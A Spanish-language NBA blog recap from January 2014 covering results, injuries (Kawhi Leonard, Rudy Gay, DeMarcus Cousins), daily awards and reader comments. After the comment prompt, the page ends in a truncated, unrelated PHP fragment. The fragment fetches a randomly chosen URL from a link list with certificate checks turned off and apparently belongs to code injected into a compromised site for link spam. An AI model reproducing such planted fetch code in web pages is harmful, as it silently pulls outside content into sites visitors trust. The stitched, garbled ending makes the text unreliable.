La Crónica: Día de lesiones

23 de January de 2014 por Simon

Interesante jornada la de ayer con muchos de los mejores equipos de la competición en liza. Uno de los mayores atractivos de la jornada era comprobar cómo les iba a los Pacers en su recién iniciada gira por el Oeste y el resultado fue una dura derrota en Phoenix. Los Suns jugaron un partido perfecto lanzando un 54% de campo y se deshicieron sin ningún problema de Paul George y sus compañeros (100-124). Indiana perdió demasiados balones lo que permitió a los de Arizona un elevado número de puntos fáciles.

De todas maneras, el partido más interesante de la jornada era el enfrentamiento entre los dos mejores equipos del Oeste. Oklahoma City Thunder visitaba a San Antonio Spurs para tratar de asaltar su primer puesto del Oeste. Y así fue, los Thunder lograron imponer su juego en el AT&T center y se colocan primeros de conferencia gracias a otra enorme exhibición de Kevin Durant que ayer estuvo acompañado por un gran Reggie Jackson. De hecho fue el base el que, con 13 puntos en el último cuarto, logró romper la igualdad que imperó durante todo el partido y consiguió una ventaja mínima para los suyos que San Antonio ya no pudo recuperar (111-105). Muy cara le salió la derrota a San Antonio ya que además de perder el liderato de la conferencia, perdió a uno de los pilares del equipo, Kawhi Leonard, que se ha roto el cuarto metacarpiano de la mano derecha y de momento es baja indefinida. 

Otro equipo al que más le valdría no haber jugado ayer son los Sacramento Kings. No habían pasado ni 5 minutos del encuentro cuando Rudy Gay se lesionaba después de una entrada a canasta. A mitad del segundo cuarto seguirían las desgracias para los californianos. Demarcus Cousins se torcía el tobillo y tenía que abandonar el encuentro. De momento no ha transcendido el alcance de la lesión de Gay pero parece que es el tendón de Aquiles la zona lesionada. Mal asunto. Lo de Cousins tiene mejor pronóstico y parece que se quedará en un simple esguince que lo tendrá parado 2/3 semanas. Mientras tanto los Rockets vencían con comodidad y sin demasiados alardes a los mermamos Kings (98-119). Con esta victoria los Rockets igualan en la clasificación a Los Angeles Clippers que ayer se vieron sorprendidos en la cancha de Charlotte Bobcats tras un partido igualadísimo en el que Charlotte fue mejor en el último minuto (91-95).

Tranquilos deben estar los Bobcats viendo la inoperancia absoluta de los equipos que le persiguen en la clasificación. Los Knicks siguen en caída libre y ayer perdieron en casa ante los Sixers con Evan Turner batiendo su record personal de anotación (110-106); Detroit perdió ante el peor equipo de la liga, los Milwaukee Bucks, en otro de sus típicos últimos cuartos en los que todos tienen miedo a meterla (101-104), y los Cavs  no pudieron aprovechar su localía y perdieron ante unos Bulls a los que inexplicablemente la baja de Luol Deng ha espoleado (98-87). Ayer era la primera vez que Deng y los Bulls se cruzaban en el camino y la verdad es que al alero no le fue muy bien anotando sólo dos canastas en 11 intentos.

Los Wizards continúan con su “maldición del 50%” y es que cada vez que alcanzan ese porcentaje de victorias el siguiente partido lo pierden. Ayer no fue menos y aunque estuvieron a punto de romper la maldición finalmente terminaron perdiendo tras una prórroga ante los Boston Celtics. Los Wizards remontaron una desventaja de 17 puntos e incluso tuvieron un lanzamiento cómodo para que Nené cerrara el partido pero erró su lanzamiento y los Celtics lograron la victoria en la prórroga con Gerald Wallace logrando la canasta decisiva (113-111).

Por su parte, los Raptors vencieron a unos Mavs que echaron de menos a Dirk Nowitzki en unos minutos decisivos en los que nadie fue capaz de anotar y que permitieron remontar a los canadienses (85-93),  y los Hawks defendieron la tercera plaza del Este gracias a la victoria a domicilio sobre los  Magic que llegaron al último minuto por delante pero que fueron incapaces de cerrar el encuentro (112-109).

PREMIOS

MVP: Sorpresa y MVP, todo a la vez. Jeff Green cuajó su mejor partido de la temporada con 39 puntos, 9 rebotes y 3 robos. Y además los Celtics se impusieron a un equipo en buena forma como son los Wizards. Demar DeRozan llegó a los 40 puntos en la victoria de los Raptors frente los Mavs y Evan Turner consiguió 34 puntos y 11 rebotes ante los Knicks.

Rookie: Enorme partido de Victor Oladipo. Fue el mejor de los Magic con 24 puntos, 7 rebotes, 7 asistencias y 2 robos. Su principal rival en la lucha por el ROY, Michael Carter Williams, firmó 19 puntos, 12 rebotes, 7 asistencias y 2 robos aunque no estuvo tan acertado de cara al aro.

Sorpresa: Además del partidazo de Jeff Green hemos de destacar los 30 puntos, 7 rebotes y 5 asistencias de Caron Butler y los 27 puntos, 7 asistencias y 5 rebotes de un DJ Augustine que se ha convertido en el Nate Robison de los Bulls de esta temporada.

Decepción: Muy mal le fueron las cosas a Kyle Lowry que falló los 10 lanzamientos que intentó y se quedó en 3 puntos. Al menos el bae de Toronto aportó en otros apartados porque Kyle Singler nos dejó uno de los partidos más horribles que recuerdo: 0 puntos con un 0 de 7, 1 rebote, 0 asistencias, 0 robos, 0 tapones y 1 balón perdido. Todo (o nada) en 19 minutos.

Esfuerzo en vano: La lesión de Kawhi Leonard dejó al Big Three de San Antonio muy solo ante el peligro. Tony Parker dio un paso adelante y con 37 puntos puso en aprieto a los Thunder. Y eso que el francés también anda tocado.

TOP-10


Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Denise dice:
    #1

    Hornacek para mí debe ser indiscutiblemente entrenador del año. De un equipillo que aspiraba al Top 3 del Draff’14 y que había desperdiciado su pick 5 en Alex Len ha formado un equipo de playoffs convirtiendo a tios antes mediocres como los hermanos Morris, PJ Tucker, Gerald Green ó Plumlee en jugadorazos. Y todo esto, sin poder contar con Bledsoe buena parte del año.

    Los Knicks creo que acabaran clasificando para Playoffs, pero ojo que los partidos pasan y pasan, y sigue con una brecha ahí de 3 partidos de diferencia.

    Nunca me ha gustado especialmente De Rozan pero su temporada merece el premio del All-Star.

    Muy meritoria victoria de Bobcats ante Clippers, y con Kemba Walker de baja dos semanas, otro que estaba haciendo una temporada de All-Star. Los Bobcats creo que ya se han quitado los nervios de encima y van a hacer playoffs este año. En su debe, sigue sin gustarme Kidd-Gilchrist, para mí su nivel del año pasado y este no justifica en absoluto un pick 2.

    Si aquí existiese el descenso, Vaughn estaría destituido desde hace semanas, el equipo no juega a nada y su ataque es una improvisación continua.

    Gay y Cousins lesionados en el tendón de Aquiles, veremos a ver en que queda, si son graves las lesiones, dudo mucho que Sacramento pueda ganar mucho más. El beneficiado sería McLemore que tendría los minutos que reclamábamos ayer.

      Citar

  2. Esteban dice:
    #2

    Sigo esperando un movimiento de parte de los Bobcats para que se estabilicen definitivamente en PO y hasta peleen por una segunda ronda

    vengo diciendo que ben gordon por Jeff Green puede ser una opción, y a la vez, MKG a cambio de Afflalo

    ambos trades tendrían sentidos para ambas partes, los celtics se limpian el contrato de Green y el año que viene desaparecen 12 millones que cobraba Gordon,

    Los Magic, siguen usando a Aflallo de alero cuando es escolta, y MKG podría jugar en la posición de 3 y apostar un poco al supuesto potencial que tiene

    asi los Bobcats, salen de un MKG que hoy por hoy es un fracaso y si bien tiene tiempo de mejorar, los Bobcats deberían jugar a todo hoy mismo, y consiguen un escolta de garantías, mientras que usan el expiring de Gordon que no juega y lo transforman en un alero de poder interesante como green (lo mismo valdría para un trade por turner en lugar de green)

    se imagan un walker-afflalo-green-Mcroberts-Jefferson, con Sessions, Henderson Biyombo y Zeller desde la banca?

    hoy por hoy serian el tercer equipo del este con el permiso de los Nets

      Citar

  3. Ruxixon dice:
    #3

    DeRozan tiene unos prejuicios,ganados por sus primeros años,que hacen que probablemente se le haya dado más leña de la que se haya merecido,por mi parte incluido.Creo que merece que le miremos con otros ojos -ya desde la temporada pasada- pues gran rendimiento el suyo en un equipo donde todo gira en torno a la defensa.Por cierto que Lowry y esos intangibles que se comentan en la crónica fueron claves en el último cuarto.

    Las derrotas de Knicks y Pistons contra 76ers y Bucks no hacen más que constatar el nivel tan desastroso que tienen.

      Citar

  4. Esteban dice:
    #4

    Ruxixon:
    DeRozan tiene unos prejuicios,ganados por sus primeros años,que hacen que probablemente se le haya dado más leña de la que se haya merecido,por mi parte incluido.Creo que merece que le miremos con otros ojos -ya desde la temporada pasada- pues gran rendimiento el suyo en un equipo donde todo gira en torno a la defensa.

    lo mismo le pesa a Al Jefferson, fama de holgazan y de hce-numeros en pesimos equipos bien ganada por su paso en los Wolves, pero desde que esta en Utah ha sido un verdadero lider, llevo al equipo a los PO en el duro oeste y estuvo a punto de hacer lo mismo el año pasado, siendo sin lugar a dudas el jugador franquicia

    este año firmo por 13.500 millones y todos dicen que esta sobrepagado? perdon? 18.4 puntos y 10.4 rebotes, liderando a su equipo hacia los PO este año me parece mas que justificado, sobretodo si vemos que cualquier pivote que mide 2.10 anda en los 10 millones

    no se como se hara la seleccion para el all-star, pero hoy, sacando a Hibbert, con la lesion de Lopez, Hordfod es 4 y teniendo en cuenta que Bosh juega de falso 4/5, Jefferson es el mejor pivote del este, muy pero muy por encima de Drummond

      Citar

  5. Esteban dice:
    #5

    no se si soy yo el equivocado, pero le veo potencial como base joven a desarrollar a Taylor, quien acaba de ser cortado por los Pelicans

    no ha jugado mucho en los Nets, pero siempre lo ha hecho de manera correcta y esta en solo su segundo año en la liga

    no entiendo a los equipos que por ahorrar 1 millones de dolares (esta bien, no es una moneda pero en relación a lo que paga la NBA es bien poquito) dejan libres a jugadores jóvenes sin darles oportunidades

    sin ir mas lejos, tenemos el caso de Marshall, sin minutos en los Suns y cortado automáticamente en los Wizards sin ni siquiera verlo entrenar, y hoy promedia 10 puntos y 10 asistencias por partido; ok, no es un jugadorazo, pero es un tio util

    ojala que alguien se percate de taylor y le de la chance que entiendo merece

      Citar

  6. The wolf dice:
    #6

    Quintetos nba all-star:

    Este: Irving, Wade, George, Melo, Lebron
    Oeste: Curry, Kobe, Durant, Love, Griffin

      Citar

  7. The wolf dice:
    #7

    A los centers no les dejan jugar?

      Citar

  8. Esteban dice:
    #8

    Lo de el este si q no se debe haber visto nunca, nisiquiera un ala pivote en el quinteto, sin dudas estamos en la era de los aleros

      Citar

  9. Esteban dice:
    #9

    No me habia dado cuenta, y Howard? El primer all star de titular q se pierde desde hace cuantos años?

      Citar

  10. Vader dice:
    #10

    Se debería poder volver a votar por la posición de center como antes… Ahora vuelve haber bastantes pivots buenos para elegir en las dos conferencias uno para quinteto inicial (Hibbert, Howard, Marc G., Cousins, Duncan, Jefferson, Chandler, Lopez, Vucevic, Noah, Drummond, Sanders, Pau Gasol, Jordan…).

    Saludos

      Citar

  11. Vader dice:
    #11

    Por cierto otra lesión, Bargiani baja de forma indefinida…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>